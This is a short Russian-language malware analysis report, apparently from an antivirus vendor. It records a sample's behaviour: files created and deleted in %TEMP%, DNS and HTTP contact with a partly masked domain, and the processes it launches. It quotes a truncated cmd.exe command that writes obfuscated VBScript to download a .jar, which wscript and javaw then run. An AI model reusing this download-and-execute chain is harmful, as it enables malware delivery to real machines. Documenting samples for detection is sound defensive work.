Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo M5z= "http://www.ch#####or-provence.com/plugins/finder/ddf/files.jar">>I9p.VBS &@eCHo S1e = E4f("\]1MDU")>>I9p.VBS &@eCHo Set Z5i = CreateObject(E4f("PV[PO51[POKWWS"))>...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\i9p.vbs
- %TEMP%\yz.jar
Удаляет следующие файлы
- %TEMP%\i9p.vbs
Сетевая активность
Подключается к
- 'ch#####or-provence.com':80
UDP
- DNS ASK ch#####or-provence.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\I9p.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo M5z= "http://www.ch#####or-provence.com/plugins/finder/ddf/files.jar">>I9p.VBS &@eCHo S1e = E4f("\]1MDU")>>I9p.VBS &@eCHo Set Z5i = CreateObject(E4f("PV[PO51[POKWWS"))>...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 13
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%TEMP%\YZ.JAR"
